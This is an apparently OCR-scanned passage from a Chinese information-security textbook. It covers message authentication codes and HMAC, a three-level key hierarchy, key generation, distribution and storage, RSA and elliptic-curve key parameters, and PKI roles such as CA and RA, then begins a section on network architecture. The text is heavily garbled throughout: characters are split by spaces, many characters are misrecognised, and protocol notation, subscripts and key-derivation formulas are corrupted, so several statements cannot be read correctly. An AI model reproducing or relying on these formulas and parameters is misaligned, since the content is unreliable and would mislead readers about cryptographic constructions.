。 报 文 源 认证 ; 除 B 外 只 有 A 拥有 开 ， 也 就 具有 A 可 产生 出 B 能 解密 的 密 文 ， 所 
以 B 可 相信 该 报 文 发 自 A。 

。 报 文 认证 : 因为 攻击 者 不 知道 密 钥 K， 所 以 也 就 不 知 如 何 改 变 密 文中 的 信息 位 使 
得 在 明文 中 产生 预期 的 改变 。 因 此 ， 若 B 可 以 恢复 出 明文 ， 则 B 可 以 认为 M 中 
的 每 一 位 都 未 被 改变 。 

由 此 可 见 ， 传 统 密码 既 可 提供 保密 性 又 可 提供 认证 。 

2. 消息 认证 码 MAC 

假定 通信 双方 共享 秘密 钥 K。 若 发 送 方 A 向 接收 方 B 发 送 报 文 M， 则 A 计算 
MAC=C(M，K) 并 将 报 文 M 和 MAC 发 送 给 接收 方 : 

A_>B: MIMAC 

接收 方 收 到 报 文 后 用 相同 的 秘密 钥 K 进行 相同 的 计算 得 出 新 的 MAC， 并 将 其 与 接 
收 到 的 MAC 进行 比较 ， 若 三 者 相等 ， 则 : 

(1) 接收 方 可 以 相信 报 文 未 被 修改 ”如 果 攻 击 者 改变 了 报 文 ， 因 为 已 假定 攻击 者 不 
知道 秘密 钥 ， 所 以 他 不 知道 如 何 对 MAC 作 相 应 修改 。 这 将 使 接收 方 计算 出 的 MAC 将 
不 等 于 接收 到 的 MAC。 

(2) 接收 方 可 以 相信 报 文 来 自 意 定 的 发 送 方 ” 因 为 其 他 各 方 均 不 知道 秘密 钥 ， 因 此 
他 们 不 能 产生 具有 正确 MAC 的 报 文 。 

如 果 报 文中 加 入 序列 号 (如 HDLC，X.25 Al TCP 中 使 用 的 序列 号 )， 由 于 攻击 者 无 
法 成 功 地 修改 序列 号 ， 因 此 接收 方 可 以 相信 报 文 顺序 是 正确 的 。 

在 上 述 方法 中 ， 报 文 是 以 明文 形式 传送 的 ， 所 以 该 方法 可 以 提供 认证 ， 但 不 能 提供 
保密 性 。 若 要 获得 保密 性 有 两 种 方法 。 一 种 是 在 MAC 算法 之 后 对 报 文 加 密 : 

A_>B: E (MIC(M, Ki), K) 
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因为 只 有 A 和 B 共享 及， 所 以 可 提供 认证 ; 因为 只 有 A 和 B 共享 Ko, MAE 
供 保密 性 。 

另 一 种 是 在 MAC 算法 之 前 对 报 文 加 密 来 获得 保密 性 : 

A>B: E (M, KE) |IC(E (M, Kx), Ki) 

上 述 两 种 方法 都 需要 两 个 独立 的 密 铀 ， 并 且 收 发 双方 共享 这 两 个 密 钥 。 第 一 种 是 先 
将 报 文 作为 输入 ， 计 算 MAC， 并 将 MAC 附加 在 报 文 后 ， 然 后 对 整个 信息 块 加 密 形成 待 
发 送 的 信息 块 ; 第 二 种 是 先 将 报 文 加 密 , 然后 将 此 密 文 作为 输入 , 计算 MAC, 并 将 MAC 
附加 在 上 述 密 文 之 后 形成 待 发 送 的 信息 块 。 通 常 使 用 前 一 种 方法 ， 即 将 MAC 直接 附加 
于 明文 之 后 。 

3. 基于 hash 函数 的 消息 认证 码 

对 于 消息 的 完整 性 的 保护 , 我 们 可 以 通过 使 用 上 面 类 似 分 组 密码 的 密 文 链接 (CBC) 
模式 来 计算 消息 认证 码 MAC。 因 为 hash 函数 满足 输入 改变 输出 结果 就 不 同 的 特性 ， 所 
以 我 们 也 能 够 使 用 hash 来 验证 消息 的 完整 性 .但 是 我 们 不 能 直接 发 送 消息 MM 和 它 的 hash 
值 hM)， 因 为 攻击 者 可 以 轻易 地 把 M 换 成 M'， 把 h(M) 换 成 h(M') 。 然 而 如 果 我 们 根 
据 对 称 密 钥 进 行 hash 计算 ,我们 就 能 够 计算 基于 hash 函数 的 消息 认证 码 MAC， 即 
HMAC, 与 基于 分 组 密码 的 MAC 算法 相 比 ，HMAC 软件 执行 速度 更 快 。 


2.8 密 钥 管理 


2.8.1 密 钥 管理 的 概念 


密码 体制 的 安全 应 当 只 取决 于 密 钥 的 安全 ， 而 不 取决 于 对 密码 算法 的 保密 。 密 钥 管 
理 包括 密 钥 的 产生 、 存 储 、 分 配 、 组 织 、 使 用 、 停 用 、 更 换 、 销 毁 等 一 系列 技术 问题 。 
每 个 密 钥 都 有 其 生命 周期 ， 要 对 密 钥 的 整个 生命 周期 的 各 个 阶段 进行 全 面 管理 。 密 码 体 
制 不 同 ， 密 钥 的 管理 方法 也 不 同 。 

密 钥 管理 是 一 个 很 困难 的 问题 ， 历 史 表明 ， 从 密 钥 管 理 的 途径 窃取 秘密 要 比 单 纯 从 
破译 密码 算法 窃取 秘密 所 花 的 代价 小 得 多 。 因 此, 首先 要 了 解密 钥 管 理 的 一 些 基 本 原则 ; 
区 分 密 钥 管理 的 策略 和 机 制 ， 全 程 安全 原则 ;最 小 权利 原则 ;责任 分 离 原则 ; 密 钥 分 级 
原则 ; 密 钥 更 换 原 则 ;， 密 钥 应 当选 择 长 度 足够 ， 随 机 等 。 

2.8.11 ” 密 钥 的 分 级 安全 性 

为 了 简化 密 钥 管 理工 作 ， 可 采用 密 钥 分 级 的 策略 ， 将 密 钥 分 为 三 级 : 

。 初级 密 钥 ; 

bd 二 级 密 钥 ; 

。 主 密 钥 (高 级 密 钥 )。 


io 项 


A 
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1. 初级 密 钥 

我 们 称 直接 用 于 加 解密 数据 (通信 ， 文 件 ) 的 密 钥 为 初级 密 钥 ， 记 为 K。 其 中 用 于 通 
信保 密 的 初级 密 钥 为 初级 通信 密 钥 ， 并 记 为 K.。 称 用 于 保护 会 话 的 初级 密 钥 为 会 话 密 
钥 (Session Key)， 记 为 K。 称 用 于 文件 保密 的 初级 密 钥 为 初级 文件 密 钥 (File Key), id 
Ky o 

初级 密 钥 可 通过 硬件 或 软件 方式 自动 产生 ， 也 可 由 用 户 自己 提供 。 初 级 通信 密 钥 和 
初级 会 话 密 钥 原则 上 采用 一 个 密 钥 只 使 用 一 次 的 “一 次 一 密 ” 方 式 。 初 级 通信 密 钥 的 生 
存 周 期 很 短 。 初 级 文件 密 钥 与 其 所 保护 的 文件 有 一 样 长 的 生存 周期 。 

初级 密 钥 必须 受 更 高 一 级 的 密 钥 保 护 ， 直 到 它们 的 生存 周期 结束 为 止 。 

2. 二 级 密 钥 

二 级 密 钥 (Secondary Key) 用 于 保护 初级 密 钥 ， 记 作 Ky ， 这 里 入 表示 节点 ， 源 于 它 
在 网 络 中 的 地 位 。 当 二 级 密 钥 用 于 保护 初级 通信 密 钥 时 称 为 二 级 通信 和 密 钥 ， 记 为 Kwc。 
当 二 级 密 钥 用 于 保护 初级 文件 密 钥 时 称 为 二 级 文件 密 钥 ， 记 为 Kure 


二 级 密 钥 可 经 专职 密 钥 安装 人 员 批 准 ， 由 系统 自动 产生 ， 也 可 由 专职 密 钥 安 装 人 员 
提供 。 二 级 密 钥 的 生存 周期 一 般 较 长 ， 它 在 较 长 的 时 间 内 保持 不 变 。 二 级 密 钥 必 须 接受 
更 高 级 的 密 钥 的 保护 。 

3. 主 密 钥 


主 密 钥 (Master Key) 是 密 钥 管理 方案 中 的 最 高 级 密 钥 ， 记 作 Kw 。 主 密 钥 用 于 对 二 级 
密 钥 和 初级 密 钥 进行 保护 。 主 密 钥 由 密 钥 专 职 人 员 随 机 产生 ， 并 妥善 安装 。 主 密 钥 的 生 
存 周期 很 长 。 
2.8.1.2” 密 钥 的 生存 周期 

密 钥 必须 按时 更 换 。 和 否则 即使 采用 很 强 的 密码 算法 ， 时 间 一 长 ， 敌 手 截获 的 密 文 越 
多 ， 破 译 密码 的 可 能 性 就 越 大 。 理 想 情况 下 一 个 密 钥 只 使 用 一 次 。 但 是 完全 的 一 次 一 密 
是 不 现实 的 。 一 般 ， 初 级 密 钥 采用 一 次 一 密 ， 二 级 密 钥 更 换 的 频率 低 些 ， 主 密 钥 更 换 的 
频率 更 低 。 密 钥 更 换 的 频率 越 高 ， 越 有 利于 安全 ， 但 是 密 钥 的 管理 就 越 麻烦 。 实 际 应 用 
时 应 当 在 安全 和 方便 之 间 折 中 选择 。 


2.8.2 ”对 称 密码 的 密 钥 管理 


2.8.2.1 ”对 称 密 钥 的 生成 

对 密 钥 的 一 个 基本 要 求 是 要 具有 良好 的 随机 性 : 长 周期 性 、 非 线性 、 等 概 性 以 及 不 
可 预测 性 等 。 一 个 真正 的 随机 序列 是 不 可 再 现 的 。 任 何人 都 不 能 再 次 产生 它 。 高 效 地 产 
生 高 质量 的 真 随机 序列 ， 并 不 是 一 件 容易 的 事 。 主 密 钥 应 当 是 高 质量 的 真 随机 序列 。 真 
随机 数 应 该 从 自然 界 的 随机 现象 中 提取 : 如 基于 力学 噪声 源 产 生 密 钥 、 基 于 电子 学 噪声 
源 产 生 密 钥 ， 并 且 要 经 过 严格 的 随机 性 测试 。 

对 于 二 级 密 钥 的 产生 ， 可 以 像 产生 主 密 钥 那样 产生 真 随机 的 二 级 密 钥 。 在 主 密 钥 产 
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生 后 ， 也 可 借助 于 主 密 钥 和 一 个 强 的 密码 算法 来 产生 二 级 密 钥 。 

用 产生 主 密 钥 的 方法 产生 两 个 真 随机 数 RN1!，RN;， 再 产生 一 个 随机 数 RN3， 然 后 分 

别 以 它们 为 密 钥 对 一 个 序数 进行 四 层 加 密 ， 最 后 产生 出 二 级 密 钥 Ky 。 
Kw=E(E(E(E(i, RN'), RN;), RNi), RN3) 

要 想 根 据 序数 i 预测 出 密 钥 Kv， 必须 同时 知道 两 个 真 随机 数 RM, RN 和 一 个 随机 
数 RN3， 这 是 极 困难 的 。 

对 于 初 密 钥 的 产生 ， 为 了 安全 和 简便 ， 通 常 总 是 把 随机 数 直 接 视 为 受 高 级 密 钥 加 密 
过 的 初级 密 钥 : 

RD=E(Ks, Km) 或 RD=E(Kp Ku), 
RD=E(K;, Kyc)# RD-=E(Ky, Kyr)o 
在 需要 使 用 初级 密 钥 时 ， 用 高 级 密 钥 将 随机 数 RN 解密 : 
K=D(RD, Ky) 或 K=D(RD, Ku), 
K=D(RD, Kno) 或 KD(RD, Kyr) 

这 种 方法 的 好 处 是 安全 、 方 便 ， 一 产生 就 是 密 文 。 

二 级 密 钥 和 初级 密 钥 的 产生 都 需要 伪 随 机 数 。 伪 随机 性 的 要 求 包括 ， KAW, 
分 布 ， 独 立 性 ， 非 线性 等 ， 一 般 采 用 基于 强 密码 算法 的 产生 方法 来 生成 伪 随 机 数 。 
2.8.2.2 ”对 称 密 钥 的 分 发 

密 钥 分 配 自古 以 来 就 是 密 钥 管理 中 重要 而 薄弱 的 环节 。 过 去 ， 密 钥 的 分 配 主 要 采用 
人 工分 配 。 现 在 ， 应 当 利 用 计算 机 网 络 实现 密 钥 分 配 的 自动 化 。 

1. 主 密 钥 的 分 配 

一 般 采 用 人 工分 配 主 密 钥 ， 由 专职 密 钥 分 配 人 员 分 配 并 由 专职 安装 人 员 妥 善 安装 。 

2. 二 级 密 钥 的 分 配 

由 专职 密 钥 分 配 人 员 分 配 并 由 专职 安装 人 员 安 装 。 虽 然 这 种 人 工分 配 和 安装 的 方法 
很 安全 ， 但 是 效率 低 。 另 一 种 方法 是 直接 利用 已 经 分 配 安装 的 主 密 钥 对 二 级 密 钥 进 行 加 
密 保护 ， 并 利用 计算 机 网 络 自动 传输 分 配 。 

3. 初级 密 钥 的 分 配 

通常 总 是 把 一 个 随机 数 直 接 视 为 受 高 级 密 钥 ( 主 密 钥 或 二 级 密 钥 )， 通 常 是 二 级 密 
HD 加 密 过 的 初级 密 钥 ， 这 样 初级 密 钥 一 产生 便 成 为 密 文 形式 。 发 端 直接 把 密 文 形式 的 
初级 密 钥 通过 计算 机 网 络 传 给 收 方 ， 收 端 用 高 级 密 钥 解密 便 获 得 初级 密 钥 。 
2.8.2.3 ”对 称 密 钥 的 存储 

密 钥 的 安全 存储 管理 就 是 要 确保 密 钥 在 存储 状态 下 的 秘密 性 、 真 实 性 和 完整 性 。 安 
全 可 靠 的 存储 介质 是 密 钥 安全 存储 的 物质 条 件 ， 安 全 严密 的 访问 控制 是 密 钥 安 全 存储 的 
管理 条 件 。 

密 钥 的 存储 形态 有 以 下 几 种 : 


HE 


Mel 
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。 明文 形态 : 明文 形式 的 密 钥 。 

。 密 文 形态 : 被 密 钥 加 密 密 钥 加 密 过 的 密 钥 。 

。 分 量 形态 : 密 钥 分 量 不 是 密 钥 本 身 ， 而 是 用 于 产生 密 钥 的 部 分 参数 。 

密 钥 安全 存储 的 原则 是 不 允许 密 钥 以 明文 形式 出 现在 密 钥 管理 设备 之 外 。 

1. 主 密 钥 的 存储 

主 密 钥 是 最 高 级 的 密 钥 ， 所 以 它 只 能 以 明文 形态 存储 ， 否 则 便 不 能 工作 。 要 求 存储 
器 必须 是 高 度 安全 的 ， 物 理 上 是 安全 的 ， 而 且 罗 和 辑 上 也 是 安全 的 。 通 常 是 将 其 存储 在 专 
用 密码 装置 中 。 

2. 二 级 密 钥 的 存储 

二 级 密 钥 可 以 以 明文 形态 存储 ， 也 可 以 以 密 文 形态 存储 。 如 果 以 明文 形态 存储 ， 则 
要 求 存储 器 必须 是 高 度 安 全 的 。 如 果 以 密 文 形态 存储 ， 则 对 存储 器 的 要 求 可 适当 降低 。 
通常 采用 以 高 级 密 钥 加 密 的 形式 存储 二 级 密 钥 。 这 样 可 减少 明文 形态 密 钥 的 数量 ， 便 于 
管理 。 

3. 初级 密 钥 的 存储 

初级 文件 密 钥 和 初级 会 话 密 钥 是 两 种 性 质 不 同 的 初级 密 钥 ， 因 此 其 存储 方式 也 不 相 
同 。 初 级 文件 密 钥 的 生命 周期 与 受 保护 的 文件 的 生命 周期 一 样 长 。 因 此 初级 文件 密 钥 需 
要 妥善 的 存储 。 初 级 文件 密 钥 一 般 采 用 密 文 形态 存储 ， 通 常 采用 以 二 级 文件 密 钥 加 密 的 
形式 存储 初级 文件 密 钥 。 初 级 会 话 密 钥 按 “一 次 一 密 ” 的 方式 工作 ， 使 用 时 动态 产生 ， 
使 用 完毕 后 即 销毁 ， 生 命 周期 很 得。 因此 ， 初 级 会 话 密 钥 的 存储 空间 是 工作 存储 器 ， 应 
当 确 保 工 作 存储 器 的 安全 。 


2.8.3 ” 非 对 称 密码 的 密 钥 管理 


2.8.3.1 ” 非 对 称 密 钥 的 生成 

密码 体制 不 同 ， 密 钥 的 管理 方法 也 不 同 。 因 此 公 钥 密码 的 密 钥 管理 与 传统 密码 的 密 
钥 管 理 大 不 相同 : 

传统 密码 只 有 一 个 密 钥 ， 加 密 钥 等 于 解密 钥 (Ke=Ka)。 因 此 ， 密 钥 的 秘密 性 、 真 实 
性 和 完整 性 都 必须 保护 。 公 开 密 钥 密 码 有 两 个 密 钥 ， 加 密 钥 与 解密 钥 不 同 (KK), m 
且 由 加 密 钥 在 计算 上 不 能 求 出 解密 钥 ， 所 以 加 密 钥 的 秘密 性 不 用 确保 。 

虽然 公开 密 钥 密 码 体制 的 加 密 钥 可 以 公开 ， 其 秘密 性 不 需要 保护 ， 但 其 完整 性 和 真 
实 性 却 必须 严格 保护 。 公 开 密 钥 密 码 体 制 的 解密 钥 的 秘密 性 、 真 实 性 和 完整 性 都 必须 
保护 。 

传统 密码 体制 的 密 钥 本 质 上 是 一 种 随机 数 或 随机 序列 ， 因 此 传统 密码 体制 的 密 钥 产 
生 本 质 上 是 产生 具有 和 良好 密码 学 特性 的 随机 数 或 随机 序列 。 公 开 密 钥 密码 体制 本 质 上 是 
一 种 单 向 陷 门 函数 ， 它 们 都 是 建立 在 某 一 数学 难题 之 上 的 。 不 同 的 公开 密 钥 密 码 体制 所 
依据 的 数学 难题 不 同 ， 因 此 其 密 钥 产生 的 具体 要 求 不 同 。 但 是 ， 它 们 都 必须 满足 密码 安 
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全 性 和 应 用 的 有 效 性 对 密 钥 所 提出 的 要 求 。 

对 于 RSA 密码 ， 其 秘密 钥 为 <p,q,p(n),4>， 公 开 钥 为 <n,e>， 因 此 其 密 钥 的 产生 主要 
是 根据 安全 性 和 工作 效率 来 合理 地 产生 这 些 密 钥 参 数 。p 和 4 越 大 则 越 安 全 ， 但 工作 效 
率 就 越 低 。 反 之 ，P 和 4 越 小 则 工作 效率 就 越 高 ， 但 安全 性 就 越 低 。 根 据 目前 的 因子 分 
解 能 力 ， 对 于 一 般 应 用 , p 和 9g 至 少 要 有 512 位 ， 以 使 n EWA 1024 位 ; 而 对 于 重要 应 
H, pR q 至 少 要 有 1024 位 ， 以 使 n 至 少 有 2048 fir. p 和 gq 要 随机 ; p 和 g 的 差 要 大 ; 
(p-1) 和 (gq-1) 的 最 大 公 因 子 要 小 ; e 和 4 都 不 能 太 小 等 等 。 

椭圆 曲线 密码 ， 由 下 面 的 六 元 组 所 描述 : 

T=<p, a, b, G, n, h> 

其 中 ，P 为 大 素数 ，p 确定 了 有 限 域 GF (p); Ba, bEGF(p), a Al b tine TH 

圆 曲 线 ，G 为 循环 子 群 E 的 生成 元 ，n 为 素数 且 为 生成 元 G 的 阶 。 私 钥 定 义 为 一 个 随 


de{0, 1, 2, =, n-1}。 


O=dG 

对 于 椭圆 曲线 密码 ， 其 用 户 的 私 钥 gd 和 公 钥 O 的 生成 并 不 困难 。 困 难 的 是 其 系统 参 
数 <p，a，b，G，7> 的 选取 。 也 就 是 椭圆 曲线 的 选取 。 一 般 认 为 ， 目 前 椭圆 曲线 的 参数 
n 和 的 规模 应 大 于 160 位 。 参 数 的 越 大 ， 越 安全 ， 但 曲线 选择 越 困难 ， 资 源 的 消耗 也 
越 多 。 

和 传统 密码 一 样 ， 公 钥 密 码 也 需要 进行 密 钥 分 配 。 但 是 ， 公 钥 密码 的 密 钥 分 配 与 传 
统 密码 体制 的 密 钥 分 配 有 着 本 质 的 差别 。 在 密 钥 分 配 时 必须 确保 解密 钥 的 秘密 性 、 真 实 
性 和 完整 性 。 因 为 公 钥 是 公开 的 ， 因 此 不 需 确保 秘密 性 。 然 而 ， 却 必须 确保 公 钥 的 真实 
性 和 完整 性 ， 绝 对 不 允许 攻击 者 替换 或 自 改 用 户 的 公 钥 。 
2.8.3.2” 公 钥 基 础 设施 PKI 

采用 数字 签名 技术 可 以 确保 公开 钥 的 安全 分 配 。 经 过 可 信 实 体 签 名 的 一 组 信息 的 集 
合 被 称 为 证 书 〈Certificate)， 而 可 信 实 体 被 称 为 签证 机 构 CA (Certification Authority). 

一 般 地 讲 , 证 书 是 一 个 数据 结构 , 是 一 种 由 一 个 可 信任 的 权威 机 构 签署 的 信息 集合 。 
在 不 同 的 应 用 中 有 不 同 的 证 书 。 例 如 公 钥 证 书 PKC (Public Key Certificate), PGP 证 书 、 
SET 证 书 等 。 公 钥 证 书 PKC 是 一 种 包含 持 证 主体 标识 、 持 证 主体 公 钥 等 信息 ， 并 由 可 
信任 的 签证 机 构 (CA) 签署 的 信息 集合 。 公 钥 证 书 主要 用 于 确保 公 钥 及 其 与 用 户 绑 定 关 
系 的 安全 。 这 个 公 钥 就 是 证 书 所 标识 的 那个 主体 的 合法 的 公 钥 。 

公 钥 证 书 的 持 证 主体 可 以 是 人 、 设 备 、 组 织 机 构 或 其 他 主体 。 公 钥 证 书 能 以 明文 的 
形式 进行 存储 和 分 配 。 任 何 一 个 用 户 只 要 知道 签证 机 构 的 公 钥 ， 就 能 检查 对 证 书 的 签名 
的 合法 性 。 如 果 检 查 正确 ， 那 么 用 户 就 可 以 相信 那个 证 书 所 携带 的 公 钥 是 真实 的 ， 而 且 
这 个 公 钥 就 是 证 书 所 标识 的 那个 主体 的 合法 的 公 钥 。 日 常生 活 中 有 许多 使 用 证 书 的 例子 ， 
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例如 汽车 驾照 。 轰 照 由 可 信 的 公安 机 关 签 发 ， 以 标识 驾驶 员 的 鸭 驶 资格 。 由 于 有 公安 机 
关 的 签 章 ， 任 何人 都 可 以 验证 驾照 的 真实 性 。 又 由 于 鸭 照 上 印 有 鸭 驶 员 的 照片 ， 从 而 实 
现 驾驶 员 与 驾照 之 间 的 严格 绑 定 。 

有 了 公 钥 证 书 系统 后 ， 如 果 某 个 用 户 需要 任何 其 他 已 向 CA 注册 的 用 户 的 公 钥 ， 可 
向 持 证 人 或 证 书 机 构 〉 直 接 索 取 公 钥 证 书 。 用 CA 的 公 钥 验证 CA 的 签名 ， 从 而 获得 
可 信 的 公 钥 。 由 于 公 钥 证 书 不 需要 保密 ,可 以 在 公 网 上 分 发 ， 从 而 实现 公 钥 的 安全 分 配 。 
又 由 于 公 钥 证 书 有 CA 的 签名 ， 攻 击 者 不 能 伪造 合法 的 公 钥 证 书 。 因 此 ， 只 要 CA 是 可 
信 的 ， 公 钥 证 书 就 是 可 信和 的 。 

使 用 公 钥 证 书 的 主要 好 处 是 : @ 用 户 只 要 获得 其 他 用 户 的 证 书 ， 就 可 以 获得 其 他 用 
PRAH. QHP Ae CA 的 公 钥 ， 就 可 以 安全 地 认证 其 他 用 户 的 公 钥 。 因 此 公 钠 
证 书 为 公 钥 的 分 发 葛 定 了 基础 ， 成 为 公 钥 密 码 在 大 型 网 络 系统 中 应 用 的 关键 技术 。 这 就 
是 电子 政务 、 电 子 商务 等 大 型 网 络 应 用 系统 都 采用 公 钥 证 书 技术 的 原因 。 

公 钥 证 书 、 证 书 管理 机 构 、 证 书 管理 系统 、 围 绕 证 书 服务 的 各 种 软 硬 件 设备 以 及 
相应 的 法 律 基础 共同 组 成 公开 密 钥 基础 设施 PKI (Public Key Infrastructure). AF #44 
基础 设施 提供 一 系列 支持 公开 密 钥 密码 应 用 〈 加 密 与 解密 、 签 名 与 验证 签名 ) 的 基础 
服务 。 

KE, PKI 是 一 种 标准 的 公 钥 密码 的 密 钥 管理 平台 。 公 钥 证 书 是 PKI 中 最 基础 的 
组 成 部 分 。 此 外 ，PKI 还 包括 签发 证 书 的 机 构 (CA)， 注 册 登 记 证 书 的 机 构 CRA), FF 
储 和 发 布 证 书 的 目录 ， 密 钥 管理 ， 时 间 戳 服务 ， 管 理 证 书 的 各 种 软件 和 硬件 设备 ， 证 书 
管理 与 应 用 的 各 种 政策 和 法 律 ， 以 及 证 书 的 使 用 者 。 所 有 这 些 共同 构成 了 PKI。 

1， 签 证 机 构 CA 

在 PKI 中 ，CA 负责 签发 证 书 、 管 理 和 撤销 证 书 。CA 严格 遵循 证 书 策略 机 构 所 制 
定 的 策略 签发 证 书 。CA 是 所 有 注册 用 户 所 信赖 的 权威 机 构 。CA 在 给 用 户 签发 证 书 时 要 
加 上 自己 的 签名 ， 以 确保 证 书信 息 的 真实 性 。 为 了 方便 用 户 对 证 书 的 验证 ，CA 也 给 自 
己 签 发 证 书 。 这 样 ， 整 个 公 钥 的 分 配 都 通过 证 书 形 式 进行 。 

对 于 大 范围 的 应 用 ， 一 个 CA 是 远 远 不 够 的 ， 往 往 需要 许多 CA。 例 如 对 于 某 一 行 
业 ， 国 家 建立 一 个 最 高 级 的 CA， 称 为 根 CA。 每 个 省 建立 一 个 省 CA， 每 个 地 市 也 都 可 
以 建立 CA， 甚至 一 个 企业 也 可 以 建立 自己 的 CA。 不同 的 CA 服务 于 不 同 的 范围 ， 履 行 
不 同 的 职责 。 

2. 注册 机 构 RA 

RA (Registration Authority) 是 专门 负责 受理 用 户 申请 证 书 的 机 构 。 根 据 分 工 ，RA 
并 不 签发 证 书 ， 而 是 负责 对 证 书 申请 人 的 合法 性 进行 认证 ， 并 决定 是 批准 或 拒绝 证 书 
申请 。 

证 书 的 签发 由 CA 进行 。RA 的 主要 功能 如 下 : 

© 接收 证 书 申请 人 的 注册 信息 ， 并 对 其 合法 性 进行 认证 ; 
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@ 批准 或 拒绝 证 书 的 申请 ; 

@ 批准 或 拒绝 恢复 密 钥 的 申请 ; 

© 批准 或 拒绝 撤销 证 书 的 申请 。 

对 于 一 个 小 范围 的 系统 ， 由 CA ARE RA 的 职能 是 可 以 的 。 但 随 着 用 户 的 增多 ，CA 
与 RA 应 当 职 责 分 开 。 申 请 注册 有 不 同 的 方式 ， 有 在 线 的 方式 和 离线 的 方式 。 在 Intemet 
环境 中 可 以 Web 浏览 器 方式 进行 在 线 注 册 。 注册 的 过 程 是 用 户 与 CA 建立 信任 关系 的 一 
个 重要 步骤 。 

3. 证 书 的 签发 

经 过 RA 的 注册 批准 后 ， 便 可 向 CA 申请 签发 证 书 。 与 注册 方式 一 样 ， 向 CA 申请 
签发 证 书 可 以 在 线 申请 ， 也 可 以 离线 申请 。 特 别 是 在 INTERNET 环境 中 可 以 WEB 浏览 
器 方式 在 线 申 请 签发 证 书 ， 越 来 越 受 到 欢迎 。 

CA 签发 证 书 的 过 程 如 下 : 

© 用 户 向 CA 提交 RA 的 注册 批准 信息 及 自己 的 身份 等 信息 (或 由 RA 向 CA 提交 ); 

@ CA 验证 所 提交 信息 的 正确 性 和 真实 性 ; 

© CA 为 用 户 产 生 密 钥 (或 由 用 户 自己 产生 并 提供 密 钥 )， 并 进行 备份 ; 

@ CA 生成 证 书 ， 并 施加 签名 ; 

© 将 证 书 的 一 个 副本 交 给 用 户 ， 并 存档 入 库 。 

证 书 产生 之 后 ， 必 须 以 一 定 的 方式 存储 和 发 布 ， 以 便于 使 用 。 为 了 方便 证 书 的 查询 
和 使 用 ，CA 采用 证 书目 录 的 方式 集中 存储 和 管理 证 书 。 通 常 采用 建立 目录 服务 器 证 书 
库 的 方式 为 用 户 提供 证 书 服务 。 为 了 应 用 的 方便 ， 证 书目 录 不 仅 存 储 管理 用 户 的 证 书 ， 
还 同时 存储 用 户 的 相关 信息 (如 ， 电 子 邮 件 地 址 ， 电 话 号 码 等 )。 因 为 证 书本 身 是 非 保密 
的 ， 因 此 证 书目 录 也 是 非 保 密 的 。 

4. 证 书目 录 

证 书目 录 提 供 了 一 种 方便 的 证 书 存储 和 分 发 。 关 于 证 书目 录 ， 目 前 尚 没有 一 个 统一 
的 标准 ， 但 是 基于 X.500 标准 的 目录 正 日 益 受 到 欢迎 。 另 外 常用 的 还 有 用 于 Intenet 环 
境 的 目录 存 取 协 议 ， 称 为 轻型 目录 存 取 协 议 LDAP (Lightweight Directory Access 
Protocol). LDAP 协议 在 目录 模型 上 与 X.500 兼容 ， 但 比 X.500 更 简单 ， 实 施 更 方便 。 

5. 证 书 的 认证 

证 书 认证 主要 包括 以 下 内 容 : 

O 验证 证 书 上 的 CA 签名 是 否 正确 ; 

@ 验证 证 书 内 容 的 真实 性 和 完整 性 ; 

© 验证 证 书 是 否 处 在 有 效 期 内 (由 证 书 里 的 时 间 参 数 来 限定 有 效 期 ); 

@ 验证 证 书 是 否 被 撤销 或 冻结 ; 

© 验证 证 书 的 使 用 方式 是 否 与 证 书 策略 和 使 用 限制 相 一 致 。 
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6. 证 书 的 撤销 

每 个 证 书 都 有 一 个 有 效 使 用 期 限 ， 有 效 使 用 期 限 的 长 短 由 CA 的 政策 决定 。 有 效 使 
用 期 限 到 期 的 证 书 应 当 撤销 。 证 书 的 公 钥 所 对 应 的 私 钥 泄露 ， 或 证 书 的 持 证 人 死亡 ， 证 
书 的 持 证 人 严重 违反 证 书 管理 的 规章 制度 等 情况 下 也 要 撤销 证 书 。 和 证 书 的 签发 一 样 ， 
证 书 的 撤销 也 是 一 个 复杂 的 过 程 。 证 书 的 撤销 要 经 过 申请 、 批 准 、 撤 销 三 个 过 程 。 

7. 信任 模型 

对 于 大 范围 的 PKI (如 一 个 行业 或 一 个 地 区 ， 甚 至 一 个 国家 。)， 一 个 CA 也 是 不 现 
实 的 ， 往 往 需要 许多 CA。 这 些 CA 之 间 应 当 具 有 某 种 结构 关系 ， 以 使 不 同 CA 之 间 的 证 
书 认 证 简单 方便 。 证 书 用 户 、 证 书 主体 、 各 个 CA 之 间 的 证 书 认 证 关系 称 为 PKI 的 信任 
模型 。 人 们 已 经 提出 了 树 层次) 模型、 森林 模 型 等 多 种 信任 模型 。 
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3.1 计算 机 网 络 基本 知识 


3.1.1 计算 机 网 络 的 体系 结构 


3.1.1.1 计算 机 网 络 体系 结构 的 定义 

计算 机 网 络 系统 是 非常 复杂 的 系统 , 计算 机 之 间 相 互通 信 涉 及 到 许多 复杂 的 技术 问题 。 
相互 通信 的 两 台 计算 机 必须 高 度 协调 地 工作 才 行 。 也 就 是 说 ， 在 计算 机 网 络 中 要 做 到 有 条 
不 亲 地 交换 数据 ， 就 必须 遵守 一 些 事先 约定 好 的 规则 。 这 些 规则 明确 规定 了 所 交换 的 数据 
的 格式 以 及 有 关 的 同步 (在 一 定 条 件 下 应 当 发 生 什 么 事件 ， 含 有 时 序 的 意思 。) 问题 。 这 些 
为 进行 网 络 中 的 数据 交换 而 建立 的 规则 、 标 准 或 约定 就 是 网 络 协议 《Protocol)。 

为 了 设计 、 理 解 和 应 用 复杂 的 网 络 ， 人 们 提出 了 将 网 络 分 层 的 设想 。“ 分 层 ” 是 将 
庞大 、 复 杂 的 问题 转换 为 若干 较 小 、 简 单 和 单一 的 局 部 问题 ， 每 一 层 完成 一 定 的 功能 ， 
这 样 就 易于 理解 、 研 究 和 处 理 。 最 早 提出 分 层 思想 的 是 ARPANET 网 ， 从 它 的 成 功 可 以 
看 到 ， 尽 管 连 到 网 上 的 主机 和 终端 ”它们 的 型 号 和 性 能 各 不 相同 ， 但 由 于 它们 共同 遵守 
了 计算 机 网 络 的 协议 ， 所 以 可 以 通信 。 

分 层 时 应 注意 使 每 一 层 的 功能 非常 明确 。 若 层 数 太 少 , 就 会 使 每 一 层 的 协议 太 复杂 。 
但 层 数 太 多 又 会 在 描述 和 综合 各 层 功能 的 系统 工程 任务 时 遇 到 较 多 的 麻烦 。 我 们 将 计算 
机 网 络 的 各 层 及 其 协议 的 集合 ， 称 为 计算 机 网 络 的 体系 结构 (Architecture)。 换 句 话说 
计算 机 网 络 的 体系 结构 就 是 这 个 计算 机 网 络 及 其 部 件 所 应 完成 的 功能 的 精确 定义 。 这 些 
